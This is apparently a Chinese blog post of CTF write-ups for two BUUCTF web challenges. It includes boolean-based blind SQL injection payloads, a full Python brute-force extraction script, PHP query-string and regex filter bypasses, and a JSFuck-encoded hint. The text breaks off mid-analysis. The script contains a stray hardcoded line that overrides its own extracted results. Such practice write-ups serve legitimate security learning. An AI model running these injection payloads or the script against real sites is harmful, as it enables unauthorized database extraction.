BUUCTF--[MRCTF2020]套娃&[WUSTCTF2020]颜值成绩查询

已于 2023-10-12 22:14:12 修改
阅读量192 收藏
点赞数
分类专栏: CTF刷题集合 文章标签: 数据库 安全 前端 网络安全 python 学习 青少年编程
于 2023-10-12 22:13:49 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44016181/article/details/133800130
版权

[WUSTCTF2020]颜值成绩查询

原始信息

题目

只有一个网页查询窗口,对应URL展示的信息如下:

GET:9896d2a5-7d1b-4efb-8c0f-1d7703e99761.node4.buuoj.cn:81/?stunum=1
return: Hi admin, your score is: 100

GET:9896d2a5-7d1b-4efb-8c0f-1d7703e99761.node4.buuoj.cn:81/?stunum=-1
return:student number not exists.

1-1

其余信息扫不出来。

解题

无法对ID进行普通的SQL注入,因为这个有数值验证。

如果是数据库内查询这个句子会变成啥?

尝试使用SQL数据库的if语句进行查询:

布尔注入,使用if(a,b,c)辅助实现。
如果a为true,则返回b
如果a为false,返回c

简单的理解了什么是if语句后,尝试使用这个句子进行访问:

GET:9896d2a5-7d1b-4efb-8c0f-1d7703e99761.node4.buuoj.cn:81/?stunum=if((1>0),1,-1)
return: Hi admin, your score is: 100

1

GET:9896d2a5-7d1b-4efb-8c0f-1d7703e99761.node4.buuoj.cn:81/?stunum=if((1<0),1,-1)
return:student number not exists.

-1
既然能通过布尔状态返回两种有特殊特征的字符串,那么可以尝试进行 布尔注入

# 以下面这句句子为基础,我们只需要替换一个地方的字符串即可:
# 大括号的位置是我们要换上的内容
## 第一部分句子:
http://e8d02b1d-0f1f-44bd-b85e-b32fba306b48.node4.buuoj.cn:81/?stunum={}
## 第二部分句子:这个就是我们要修改的句子,或者注入的句子
## {0}是注入的句子,{1}是截取的字符串的起始位置,{2}是ascii字符串的十进制值
## 我们只需要插入到{0}的位置即可。{1}和{2}是后面爆破用的,这里暂时省略
## ord:将对应字符转为ascii码的十进制数
## substring(x,1,1):将字符串x从第1位开始截取1位。
if((ord(substring({0},{1},1))={2}),1,-1)

在写布尔注入前,先提一嘴SQL注入的流程:

SQL注入的流程大概分为:爆库 => 爆表 => 爆表字段 => 爆字段值

作为个人,博主习惯的是直接获取一列的内容直接进行展出

针对{0}位置的语句插入进行布尔注入:

# 爆库
{0} = (database())
## 合并为完整的一句:(假设当前爆破的是数据库名的第二个字符)
http://e8d02b1d-0f1f-44bd-b85e-b32fba306b48.node4.buuoj.cn:81/?stunum=if((ord(substring((database()),2,1))=97),1,-1)
## 仔细观察这句就能看出大概构造流程的最终结果了
## 下面仅描述{0}插入的值
# 经过查询,爆出的列数据库名字为:ctf

# 爆表
{0} = (select(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))
# 查出的表名:'flag,score'

# 爆字段(两个表,每个表分开爆)
{0} = (select(group_concat(column_name))from(information_schema.columns)where(table_name="flag"))
{0} = (select(group_concat(column_name))from(information_schema.columns)where(table_name="score"))
# 爆出的结果是:['flag,value', 'id,name,score']

# 爆字段值(当前仅选择flag表的value列)
{0} = (select(group_concat(value))from(ctf.flag))
# 这个查出来直接就是flag了。

为了方便爆破,自己写了个脚本进行辅助。不过因为不是多线程,爆破速度比较缓慢……

# coding=utf8
import requests, time
# tqdm,进度条库
from tqdm import tqdm, tnrange

## 测试布尔注入
def bool_cs_request(url, get_vals, code):
    urls = url + '?' + get_vals

    def get_status(value):
        """
        攻击包内容判断器
        :param value: 传入html包内容
        :return: 检测状态的布尔值
        """
        if "student number not exists" not in value.text and "Hi admin, your score is: 100" in value.text:
            return True
        else:
            return False

    def get_val(value, urls):
        """
        布尔爆破器
        :param value:爆破的SQL语句
        :param urls: 爆破的URL
        :return: 爆破后的字符串

        唯一弊端:太慢了,没有达到多线程攻击
        """
        data = {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0"
        }
        name_val = ''
        all_sql = 'if((ord(substring({0},{1},1))={2}),1,-1)'
        get_database_name_sql = value
        for i in range(1, 100000):
            lin_val = name_val
            for ascii_one in tqdm(list, desc='单字符攻击进度', unit='个'):
                val = requests.get(urls.format(all_sql.format(get_database_name_sql, i, ascii_one)), headers=data)
                time.sleep(0.1)
                if get_status(val):
                    name_val += chr(ascii_one)
                    print()
                    print(name_val)
                    break

            if lin_val == name_val:
                break
        return name_val

    # 生成ascii码表
    # ascii表数据已经优化,以达到提高扫描速度的目的
    def n_to_l(num_start, num_end):
        lists = []
        for i in range(num_start, num_end):
            lists.append(i)
        return lists

    l ,ls= n_to_l(97, 122) + n_to_l(65, 90) + n_to_l(48, 58) + [95, 123, 125, 44, 45, 46] + n_to_l(32, 43)[::-1],[]
    for i in range(32, 127):
        if i not in l:
            ls.append(i)
    list = l+ls[::-1]

    # 爆库名
    database_sql = 'database()'
    database_name = get_val(database_sql, urls)

    # print('数据库名:' + database_name)

    # 爆表
    table_sql = "(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))"
    table_name = get_val(table_sql, urls)
    table_list = []
    flag = 0
    # 分割获取的表名存入列表当中
    if ',' in table_name:
        table_list = table_name.split(',')
        flag = 1

    # 爆列/字段
    ## 存储每个表对应的字段
    l_list = []
    if flag == 1:
        for name in table_list:
            l_sql = '(select(group_concat(column_name))from(information_schema.columns)where(table_name="{}"))'.format(
                name)
            l_list.append(get_val(l_sql, urls))
    l_list = ['flag,value', 'id,na']

    ## 分割每个表字段的值
    all_field = [i.split(',') for i in l_list]

    # 爆破值
    find_num = 0
    field_num = 0
    try:
        print('库名:',database_name)
        print('只能输入数字,不能输入其它。')
        print('表名:', table_list)
        print('字段:', all_field)
        control_table = input('请输入要控制的查那些表(注意!只能选择一张表进行查询!):').strip()
        control_field = input('请输入要控制的表对应的字段有那些(以0为初始值选择表对应的字段,一次性只能选择一个字段):').strip()
        find_num += int(control_table)
        field_num += int(control_field)
    except:
        field_num = 0
        print('你的输入有误!默认只查询第一张表!')

    # 根据输入选择的表和字段值进行查询,防止出现遍历的情况
    if (find_num < len(table_list) and find_num >= 0):
        if field_num >= 0 and field_num <len(all_field[find_num]):
            # 生成SQL语句
            feild_val = '(select(group_concat({}))from({}.{}))'.format(all_field[find_num][field_num], database_name,
                                                                       table_list[find_num])
            print(get_val(feild_val, urls))
        else:
            print('你正在查询一个不存在的字段……')
    else:
        print('你正在查询一个不存在的表……')


if __name__ == '__main__':
    # url = 'http://e8d02b1d-0f1f-44bd-b85e-b32fba306b48.node4.buuoj.cn:81/'
    url = input('请输入你的URL(形如http://xxx.xxx.com:81/):')
    get_parameters = 'stunum={}'
    bool_cs_request(url, get_parameters, code=1)

如果要使用脚本,请记得导入对应的包。

为了让过程有趣写,加入了进度条`(∩_∩)′

执行结果消耗的时间这里先给你提个醒,会超过靶场限定的1h,做好续时间的准备吧。

总结

  • SQL注入–布尔注入
  • mysql的if语句
  • Python脚本

[MRCTF2020]套娃

原始信息

很少,但是有源代码信息提示

<!--
//1st
$query = $_SERVER['QUERY_STRING'];

 if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){
    die('Y0u are So cutE!');
}
 if($_GET['b_u_p_t'] !== '23333' && preg_match('/^23333$/', $_GET['b_u_p_t'])){
    echo "you are going to the next ~";
}
!-->

 <!DOCTYPE html>
 <html lang="en">
     <head>
         <meta charset="UTF-8">
         <title>Hello BUPTers</title>
     </head>
     <body>
         <h1>Welcome!</h1>
         <span>这只不过是个小测试区,啥都没有,还请各位多多包涵!</span>
         <span>made by crispr</span>
         <br></br>
         <br></br>
         <div>
           <img src="https://timgsa.baidu.com/timg?image&quality=80&size=b9999_10000&sec=1583738587360&di=ba2d04cc2ba8603ccaab3d9673976d76&imgtype=0&src=http%3A%2F%2Fimgsrc.baidu.com%2Fforum%2Fw%3D580%2Fsign%3D64c278455f6034a829e2b889fb1249d9%2F46c3bf12c8fcc3ce3e1a38779145d688d63f20eb.jpg" style="width:1500px;height:500px;">
         </div>
     </body>
 </html>

解题

一层

截取源代码进行分析

$query = $_SERVER['QUERY_STRING'];
# php特性,什么东西会转化为下划线
if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){
    die('Y0u are So cutE!');
}
# preg_match('/^23333$/		=>前后匹配的正则表达式,使用换行绕过
 if($_GET['b_u_p_t'] !== '23333' && preg_match('/^23333$/', $_GET['b_u_p_t'])){
    echo "you are going to the next ~";
}

尝试解开参数的下划线问题后,直接写参数:

get: ?b u p t=23333%0a
<!--
%0a是换行
bupt间的空格是控制起在服务端获取的变量名变成b_u_p_t

传参后得到信息:
-->
return: FLAG is in secrettw.php

php字符串解析机制点我查看,不过貌似版本越高解析机制越严谨。

二层

跳转到secrettw.php访问的时候得到下面信息:

Flag is here~But how to get it?Local access only!
Sorry,you don't have permission! Your ip is :sorry,this way is banned! 


Flag来了~但是怎么获取呢?仅限本地访问!
抱歉,您没有权限! 您的IP是:抱歉,此方式已被禁止! (机翻)

本地访问的话,意思就是本地IP爆破了。

翻了下题目源代码的时候,发现其中还是有一个信息:

[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(+(!+[]+!+[]+!+[]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]](!+[]+!+[]+!+[]+[!+[]+!+[]])+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]])()((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][[]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[!+[]+!+[]+[!+[]+!+[]]]+([]+[])[(![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]()[+!+[]+[!+[]+!+[]]]+(+(!+[]+!+[]+[+!+[]]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]](!+[]+!+[]+!+[]+[+!+[]])[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(+[![]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+!+[]]]+((+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(+[![]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+!+[]]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+!+[]]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(+(!+[]+!+[]+[+!+[]]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]](!+[]+!+[]+!+[]+[+!+[]])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]])()([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[(![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]]((+((+(+!+[]+[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+[!+[]+!+[]]+[+[]])+[])[+!+[]]+[+[]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+!+[]]])+[])[!+[]+!+[]]+[+!+[]])+(![]+[])[+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]])()())[!+[]+!+[]+!+[]+[+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(![]+[])[+!+[]]+(+(!+[]+!+[]+[+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]](!+[]+!+[]+[+!+[]])+([]+[])[(![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]()[+!+[]+[!+[]+!+[]]]+([+[]]+![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[!+[]+!+[]+[+[]]])

原本需要专门找个工具解码的,但是后面了解了下使用console.log的JS语法输出即可。

当然,也可以使用这个JSFuck网站解码.

解码时会弹出下面这段文本:

post me Merak

post传参,使用Merak:

post:	Merak=me

得到源码

三层–源码分析

 <?php 
error_reporting(0); 
include 'takeip.php';
ini_set('open_basedir','.'); 
include 'flag.php';

if(isset($_POST['Merak'])){ 
    highlight_file(__FILE__); 
    die(); 
} 

# 解码函数
function change($v){ 
    # base64解码
    $v = base64_decode($v); 
    $re = ''; 
    # 取出每个字符对应的十进制数,按顺序加上$i的增量
    for($i=0;$i<strlen($v);$i++){ 
        $re .= chr ( ord ($v[$i]) + $i*2 ); 
    } 
    return $re; 
}
echo 'Local access only!'."<br/>";
# 一个外部php引入的解决IP的函数
$ip = getIp();
if($ip!='127.0.0.1')
echo "Sorry,you don't have permission!  Your ip is :".$ip;
